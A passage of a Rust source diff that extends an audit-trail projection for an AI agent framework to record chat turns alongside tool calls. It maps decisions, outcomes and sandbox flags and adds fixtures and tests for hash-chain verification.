json!(bytes)); + } + + match kind(entry) { + AuditEntryKind::Invocation => project_invocation(entry, context, &mut fields), + AuditEntryKind::Turn => project_turn(entry, &mut fields), + } + + Value::Object(fields) +} + +/// The kind an entry declares, defaulting to the one every legacy entry is. +/// +/// Absence is not ignorance here. acton-ai omits the discriminator on +/// invocation entries on purpose, so that every line written before turns +/// were recorded keeps the exact bytes its hash was computed over. An entry +/// that does not say what it is, is a tool call. +#[must_use] +pub fn kind(entry: &AuditEntry) -> AuditEntryKind { + entry.entry_kind.unwrap_or(AuditEntryKind::Invocation) +} + +/// The `kind` enum value for a sealed entry. Pure. +#[must_use] +pub fn kind_column(entry: &AuditEntry) -> &'static str { + match kind(entry) { + AuditEntryKind::Invocation => "tool_call", + AuditEntryKind::Turn => "turn", + } +} + +/// The columns only a tool call fills. +fn project_invocation( + entry: &AuditEntry, + context: &ProjectionContext, + fields: &mut Map, +) { + let tool = entry.tool_name.as_deref().unwrap_or_default(); + fields.insert("tool_name".into(), json!(tool)); + if let Some(command) = command_of(entry) { + fields.insert("command".into(), json!(command)); + } fields.insert( "sandboxed".into(), - json!(context.sandbox_enabled && is_sandboxed_tool(&entry.tool_name)), + json!(context.sandbox_enabled && is_sandboxed_tool(tool)), ); - fields.insert("elapsed_ms".into(), json!(entry.duration_ms)); + fields.insert("elapsed_ms".into(), json!(entry.duration_ms.unwrap_or(0))); +} - Value::Object(fields) +/// The columns only a turn fills. +/// +/// `sandboxed` is written explicitly rather than left to the schema's +/// `default(true)`: no tool ran, so nothing was confined, and inheriting the +/// default would have every turn row claim a containment it never needed. +fn project_turn(entry: &AuditEntry, fields: &mut Map) { + fields.insert("sandboxed".into(), json!(false)); + if let Some(bytes) = entry.prompt_size_bytes { + fields.insert("prompt_bytes".into(), json!(bytes)); + } + if let Some(provider) = entry.provider.as_ref() { + fields.insert("provider".into(), json!(provider)); + } + if let Some(model) = entry.model.as_ref() { + fields.insert("model".into(), json!(model)); + } + if let Some(tokens) = entry.input_tokens { + fields.insert("input_tokens".into(), json!(tokens)); + } + if let Some(tokens) = entry.output_tokens { + fields.insert("output_tokens".into(), json!(tokens)); + } + if let Some(reason) = refusal_reason(entry) { + fields.insert("justification".into(), json!(truncate(reason, REASON_MAX))); + } +} + +/// Why admission refused a turn, when it did. +/// +/// The rendered reason is the only prose a turn entry carries, and it is the +/// one thing an auditor looking at a run of refusals actually needs: fifty +/// rows saying `forbidden` do not say whether the install lost its seat or an +/// operator paused it. +#[must_use] +pub fn refusal_reason(entry: &AuditEntry) -> Option<&str> { + match entry.turn_outcome.as_ref()? { + TurnAuditOutcome::Refused { reason, .. } => Some(reason.as_str()), + _ => None, + } } /// The command an entry ran, for a shell tool, truncated to the column. /// /// Only `bash` has one: for every other tool the arguments are structured and -/// a flattened rendering would be a worse copy of `entry`. +/// a flattened rendering would be a worse copy of `entry`. A turn entry has +/// no arguments at all and so never has one. #[must_use] pub fn command_of(entry: &AuditEntry) -> Option { - if entry.tool_name != "bash" { + if entry.tool_name.as_deref() != Some("bash") { return None; } - let command = entry.arguments.get("command")?.as_str()?; + let command = entry.arguments.as_ref()?.get("command")?.as_str()?; Some(truncate(command, COMMAND_MAX)) } @@ -158,53 +271,100 @@ pub fn is_sandboxed_tool(tool: &str) -> bool { /// The `decision` enum value for a sealed entry. Pure. /// -/// Four outcomes an auditor cares to tell apart: a human said yes -/// (`approved`), a rule said yes (`auto_approved`), a human declined +/// For a tool call, four outcomes an auditor cares to tell apart: a human said +/// yes (`approved`), a rule said yes (`auto_approved`), a human declined /// (`denied`), and a rule declined (`forbidden`). A prompt nobody answered is /// `timed_out`, which is the one case where "denied" would be a lie about a /// person. +/// +/// For a turn the gate is admission rather than approval, and it is never a +/// person: a turn that ran was let through (`auto_approved`) and a turn that +/// did not was refused (`forbidden`). #[must_use] pub fn decision_of(entry: &AuditEntry) -> &'static str { - let by_human = matches!(entry.decision.decided_by, Decider::Callback); - match (entry.decision.approved, by_human) { + match kind(entry) { + AuditEntryKind::Turn => match entry.turn_outcome.as_ref() { + Some(TurnAuditOutcome::Refused { .. }) | None => "forbidden", + Some(_) => "auto_approved", + }, + AuditEntryKind::Invocation => invocation_decision(entry), + } +} + +/// The `decision` value for a tool call. Pure. +/// +/// An entry carrying no decision at all is malformed rather than permitted. It +/// reads as `forbidden`, because the other direction would let a stripped +/// field launder a refusal into an approval, and the verbatim `entry` column +/// is still there to show what was actually sealed. +fn invocation_decision(entry: &AuditEntry) -> &'static str { + let Some(decision) = entry.decision else { + return "forbidden"; + }; + let by_human = matches!(decision.decided_by, Decider::Callback); + match (decision.approved, by_human) { (true, true) => "approved", (true, false) => "auto_approved", - (false, true) if timed_out(&entry.outcome) => "timed_out", + (false, true) if timed_out(entry) => "timed_out", (false, true) => "denied", (false, false) => "forbidden", } } /// Whether a refusal was a timeout rather than a decision. Pure. -fn timed_out(outcome: &AuditOutcome) -> bool { - matches!(outcome, AuditOutcome::Denied { reason } if reason.starts_with(TIMEOUT_REASON)) +fn timed_out(entry: &AuditEntry) -> bool { + matches!( + entry.outcome.as_ref(), + Some(AuditOutcome::Denied { reason }) if reason.starts_with(TIMEOUT_REASON) + ) } /// The `decider` enum value: which gate reached the verdict. Pure. +/// +/// Admission is a rule and never a person, since nobody is prompted to let a +/// turn start. A refused turn therefore reads as `policy` and an admitted one +/// as `default`, the same value a tool call carries when no policy was in +/// force. #[must_use] -pub fn decider_of(decision: AuditDecision) -> &'static str { - match decision.decided_by { - Decider::NoPolicy => "default", - Decider::Callback => "callback", - _ => "policy", +pub fn decider_of(entry: &AuditEntry) -> &'static str { + match kind(entry) { + AuditEntryKind::Turn => match entry.turn_outcome.as_ref() { + Some(TurnAuditOutcome::Refused { .. }) => "policy", + _ => "default", + }, + AuditEntryKind::Invocation => match entry.decision.map(|decision| decision.decided_by) { + Some(Decider::NoPolicy) | None => "default", + Some(Decider::Callback) => "callback", + Some(_) => "policy", + }, } } -/// The `outcome` enum value, when the call produced one. Pure. +/// The `outcome` enum value, when the entry produced one. Pure. /// -/// A denied call has no outcome: the tool never ran, and recording `error` -/// for it would put a refusal in the same bucket as a failure. +/// A denied call has no outcome: the tool never ran, and recording `error` for +/// it would put a refusal in the same bucket as a failure. A refused turn has +/// none for exactly the same reason, having never reached a provider. #[must_use] -pub fn outcome_of(outcome: &AuditOutcome) -> Option<&'static str> { - match outcome { - AuditOutcome::Success { .. } => Some("success"), - AuditOutcome::Error { .. } => Some("error"), - AuditOutcome::Uncertain { .. } => Some("aborted"), - AuditOutcome::Denied { .. } => None, - // acton-ai marks the enum non-exhaustive. An outcome this build does - // not understand is left unstated rather than guessed at: the - // verbatim entry still carries it. - _ => None, +pub fn outcome_of(entry: &AuditEntry) -> Option<&'static str> { + match kind(entry) { + AuditEntryKind::Turn => match entry.turn_outcome.as_ref()? { + TurnAuditOutcome::Completed => Some("success"), + TurnAuditOutcome::Failed => Some("error"), + TurnAuditOutcome::Interrupted => Some("aborted"), + TurnAuditOutcome::Refused { .. } => None, + // acton-ai marks the enum non-exhaustive. An outcome this build + // does not understand is left unstated rather than guessed at: the + // verbatim entry still carries it. + _ => None, + }, + AuditEntryKind::Invocation => match entry.outcome.as_ref()? { + AuditOutcome::Success { .. } => Some("success"), + AuditOutcome::Error { .. } => Some("error"), + AuditOutcome::Uncertain { .. } => Some("aborted"), + AuditOutcome::Denied { .. } => None, + _ => None, + }, } } @@ -281,41 +441,98 @@ pub fn projection_disagreement( /// process that can seal entries is a process that can forge them. #[cfg(any(test, feature = "testing"))] pub mod fixture { - use acton_ai::audit::{AuditDecision, AuditEntry, AuditOutcome, GENESIS_HASH}; + use acton_ai::audit::{ + AuditDecision, AuditEntry, AuditEntryKind, AuditOutcome, TurnAuditOutcome, GENESIS_HASH, + }; use acton_ai::policy::Decider; use acton_ai::types::{CorrelationId, TrailId, TurnId}; use serde_json::Value; - /// Seals one entry behind `prev_hash` at `sequence`, under `trail_id`. - #[must_use] - pub fn entry( - sequence: u64, - prev_hash: &str, - trail_id: Option<&TrailId>, - tool: &str, - arguments: Value, - outcome: AuditOutcome, - decision: AuditDecision, - ) -> AuditEntry { - let mut built = AuditEntry { + /// The fields every sealed entry carries, whichever kind it is. + /// + /// Split out so the two constructors below cannot drift on the shared + /// half: an invocation and a turn must agree about sequence, timestamp, + /// identity, and predecessor or a chain built from both would not verify. + fn skeleton(sequence: u64, prev_hash: &str, trail_id: Option<&TrailId>) -> AuditEntry { + AuditEntry { sequence, timestamp: format!("2026-08-29T12:00:{:02}Z", sequence % 60), correlation_id: CorrelationId::new(), conversation_id: None, user: None, turn_id: TurnId::new(), - tool_call_id: format!("toolu_{sequence}"), - tool_name: tool.to_string(), - arguments, - outcome, - decision, - duration_ms: 42, - response_size_bytes: Some(11), + entry_kind: None, + tool_call_id: None, + tool_name: None, + arguments: None, + outcome: None, + decision: None, + duration_ms: None, + response_size_bytes: None, + turn_outcome: None, + prompt_size_bytes: None, + provider: None, + model: None, + input_tokens: None, + output_tokens: None, resumed: false, trail_id: trail_id.cloned(), prev_hash: prev_hash.to_string(), hash: String::new(), - }; + } + } + + /// Seals one invocation entry behind `prev_hash` at `sequence`. + /// + /// `entry_kind` is deliberately left absent, which is exactly what + /// acton-ai writes for a tool call: the discriminator exists so a turn + /// can be told apart, not so an invocation has to announce itself. + #[must_use] + pub fn entry( + sequence: u64, + prev_hash: &str, + trail_id: Option<&TrailId>, + tool: &str, + arguments: Value, + outcome: AuditOutcome, + decision: AuditDecision, + ) -> AuditEntry { + let mut built = skeleton(sequence, prev_hash, trail_id); + built.tool_call_id = Some(format!("toolu_{sequence}")); + built.tool_name = Some(tool.to_string()); + built.arguments = Some(arguments); + built.outcome = Some(outcome); + built.decision = Some(decision); + built.duration_ms = Some(42); + built.response_size_bytes = Some(11); + built.hash = built.recompute_hash(); + built + } + + /// Seals one turn entry behind `prev_hash` at `sequence`. + /// + /// Metadata only, exactly as acton-ai seals it: byte counts and token + /// counts, never the prompt or the answer. + #[must_use] + pub fn turn( + sequence: u64, + prev_hash: &str, + trail_id: Option<&TrailId>, + outcome: TurnAuditOutcome, + ) -> AuditEntry { + let refused = matches!(outcome, TurnAuditOutcome::Refused { .. }); + let mut built = skeleton(sequence, prev_hash, trail_id); + built.entry_kind = Some(AuditEntryKind::Turn); + built.turn_outcome = Some(outcome); + built.prompt_size_bytes = Some(64); + built.provider = Some("anthropic".to_string()); + built.model = Some("claude-opus-5".to_string()); + // A refused turn never reached a provider, so it spent nothing and + // produced nothing. Anything else here would be a fixture that could + // not happen. + built.response_size_bytes = Some(if refused { 0 } else { 512 }); + built.input_tokens = Some(if refused { 0 } else { 900 }); + built.output_tokens = Some(if refused { 0 } else { 120 }); built.hash = built.recompute_hash(); built } @@ -342,6 +559,40 @@ pub mod fixture { } entries } + + /// A chain that interleaves turn entries with the tool calls they drove. + /// + /// The shape a real trail has once turns are recorded: a turn entry seals + /// after the calls it made, so a verifier walking the file meets both + /// kinds in one chain. + #[must_use] + pub fn mixed_chain(turns: u64, trail_id: &TrailId) -> Vec { + let mut entries: Vec = Vec::with_capacity((turns * 2) as usize); + let mut prev = GENESIS_HASH.to_string(); + let mut sequence = 0; + for round in 1..=turns { + sequence += 1; + let call = entry( + sequence, + &prev, + Some(trail_id), + "bash", + serde_json::json!({ "command": format!("echo {round}") }), + AuditOutcome::Success { + summary: "ok".to_string(), + }, + AuditDecision::approved(Decider::Callback), + ); + prev.clone_from(&call.hash); + entries.push(call); + + sequence += 1; + let sealed = turn(sequence, &prev, Some(trail_id), TurnAuditOutcome::Completed); + prev.clone_from(&sealed.hash); + entries.push(sealed); + } + entries + } } #[cfg(test)] @@ -522,41 +773,67 @@ mod tests { #[test] fn the_decider_column_separates_no_policy_from_a_human_from_a_rule() { - assert_eq!( - decider_of(AuditDecision::approved(Decider::NoPolicy)), - "default" - ); - assert_eq!( - decider_of(AuditDecision::approved(Decider::Callback)), - "callback" - ); - assert_eq!( - decider_of(AuditDecision::approved(Decider::Allowlist)), - "policy" - ); + let by_default = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::NoPolicy), + )); + let by_human = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::Callback), + )); + let by_rule = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::Allowlist), + )); + + assert_eq!(decider_of(&by_default), "default"); + assert_eq!(decider_of(&by_human), "callback"); + assert_eq!(decider_of(&by_rule), "policy"); } #[test] fn a_refused_call_has_no_outcome_because_the_tool_never_ran() { - assert_eq!( - outcome_of(&AuditOutcome::Denied { - reason: "no".to_string() - }), - None - ); - assert_eq!(outcome_of(&success()), Some("success")); - assert_eq!( - outcome_of(&AuditOutcome::Error { - message: "boom".to_string() - }), - Some("error") - ); - assert_eq!( - outcome_of(&AuditOutcome::Uncertain { - message: "unknown".to_string() - }), - Some("aborted") - ); + let denied = sealed(record( + "bash", + json!({}), + AuditOutcome::Denied { + reason: "no".to_string(), + }, + AuditDecision::refused(Decider::Denylist), + )); + let ran = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::Rules), + )); + let failed = sealed(record( + "bash", + json!({}), + AuditOutcome::Error { + message: "boom".to_string(), + }, + AuditDecision::approved(Decider::Rules), + )); + let unknown = sealed(record( + "bash", + json!({}), + AuditOutcome::Uncertain { + message: "unknown".to_string(), + }, + AuditDecision::refused(Decider::Settlement), + )); + + assert_eq!(outcome_of(&denied), None); + assert_eq!(outcome_of(&ran), Some("success")); + assert_eq!(outcome_of(&failed), Some("error")); + assert_eq!(outcome_of(&unknown), Some("aborted")); } #[test] @@ -592,6 +869,163 @@ mod tests { assert_eq!(project(&entry, &context)["sandboxed"], json!(false)); } + fn sealed_turn(outcome: TurnAuditOutcome) -> AuditEntry { + fixture::turn(1, GENESIS_HASH, Some(&TrailId::new()), outcome) + } + + fn refused(reason: &str) -> TurnAuditOutcome { + TurnAuditOutcome::Refused { + decision: "paused".to_string(), + reason: reason.to_string(), + } + } + + #[test] + fn a_turn_that_called_no_tool_still_projects_a_row() { + // The whole point of the turn entry: a chat turn that produced code + // and never touched a tool used to leave nothing behind at all. + let entry = sealed_turn(TurnAuditOutcome::Completed); + + let fields = project(&entry, &context()); + + assert_eq!(fields["kind"], json!("turn")); + assert_eq!(fields["outcome"], json!("success")); + assert_eq!(fields["chain_seq"], json!(entry.sequence)); + assert_eq!(fields["entry_hash"], json!(entry.hash)); + assert!(fields.get("tool_name").is_none()); + assert!(fields.get("command").is_none()); + } + + #[test] + fn an_entry_that_names_no_kind_is_still_a_tool_call() { + // Every line written before turns were recorded omits the + // discriminator, and must keep reading as what it is. + let entry = sealed(record( + "bash", + json!({ "command": "ls" }), + success(), + AuditDecision::approved(Decider::Callback), + )); + + assert!(entry.entry_kind.is_none()); + assert_eq!(kind(&entry), AuditEntryKind::Invocation); + assert_eq!(project(&entry, &context())["kind"], json!("tool_call")); + } + + #[test] + fn an_admitted_turn_reads_as_a_rule_that_said_yes() { + let entry = sealed_turn(TurnAuditOutcome::Completed); + + let fields = project(&entry, &context()); + + assert_eq!(fields["decision"], json!("auto_approved")); + assert_eq!(fields["decider"], json!("default")); + } + + #[test] + fn a_refused_turn_is_forbidden_and_says_which_gate_refused_it() { + // Fifty rows saying `forbidden` do not tell an auditor whether the + // install lost its seat or an operator paused it. The reason does. + let entry = sealed_turn(refused("no seat entitles this install to run")); + + let fields = project(&entry, &context()); + + assert_eq!(fields["decision"], json!("forbidden")); + assert_eq!(fields["decider"], json!("policy")); + assert_eq!( + fields["justification"], + json!("no seat entitles this install to run") + ); + } + + #[test] + fn a_refused_turn_has_no_outcome_because_it_never_reached_a_provider() { + let entry = sealed_turn(refused("admission is draining")); + + assert_eq!(outcome_of(&entry), None); + assert!(project(&entry, &context()).get("outcome").is_none()); + } + + #[test] + fn a_failed_turn_and_an_interrupted_turn_are_different_facts() { + let failed = sealed_turn(TurnAuditOutcome::Failed); + let interrupted = sealed_turn(TurnAuditOutcome::Interrupted); + + assert_eq!(outcome_of(&failed), Some("error")); + assert_eq!(outcome_of(&interrupted), Some("aborted")); + } + + #[test] + fn a_turn_row_never_claims_the_sandbox_confined_anything() { + // `sandboxed` defaults to true on the schema. A turn ran no tool, so + // leaving the column unset would have every turn overclaim. + let entry = sealed_turn(TurnAuditOutcome::Completed); + + assert_eq!(project(&entry, &context())["sandboxed"], json!(false)); + } + + #[test] + fn a_turn_row_carries_its_counts_and_none_of_its_content() { + let entry = sealed_turn(TurnAuditOutcome::Completed); + + let fields = project(&entry, &context()); + + assert_eq!(fields["prompt_bytes"], json!(64)); + assert_eq!(fields["response_bytes"], json!(512)); + assert_eq!(fields["input_tokens"], json!(900)); + assert_eq!(fields["output_tokens"], json!(120)); + assert_eq!(fields["provider"], json!("anthropic")); + assert_eq!(fields["model"], json!("claude-opus-5")); + + // The verbatim entry is the whole record, so if content were ever + // sealed into a turn it would show up here. + let verbatim = serde_json::to_string(&entry).expect("an entry serializes"); + for content in ["prompt", "response", "content", "text"] { + assert!( + !verbatim.contains(&format!("\"{content}\":\"")), + "a turn entry must carry no {content}: {verbatim}" + ); + } + } + + #[test] + fn a_turn_entry_and_a_tool_call_chain_together() { + // A real trail interleaves them, so a verifier that understood only + // one kind would report a break on every honest file. + let trail = TrailId::new(); + let entries = fixture::mixed_chain(3, &trail); + + assert_eq!(entries.len(), 6); + + let mut head = ChainHead { + sequence: 0, + hash: GENESIS_HASH.to_string(), + entries: 0, + trail_id: None, + }; + for (index, entry) in entries.iter().enumerate() { + head = verify_next(&head, entry, index + 1).expect("a mixed chain must verify"); + } + + assert_eq!(head.sequence, 6); + } + + #[test] + fn an_invocation_whose_decision_was_stripped_does_not_read_as_approved() { + // Absence must fail closed: the permissive reading would let a + // deleted field launder a refusal into an approval. + let mut entry = sealed(record( + "bash", + json!({}), + success(), + AuditDecision::approved(Decider::Callback), + )); + entry.decision = None; + + assert_eq!(decision_of(&entry), "forbidden"); + assert_eq!(decider_of(&entry), "default"); + } + fn projection_of(entry: &AuditEntry, install: &str) -> EventProjection { EventProjection { chain_seq: entry.sequence as i64,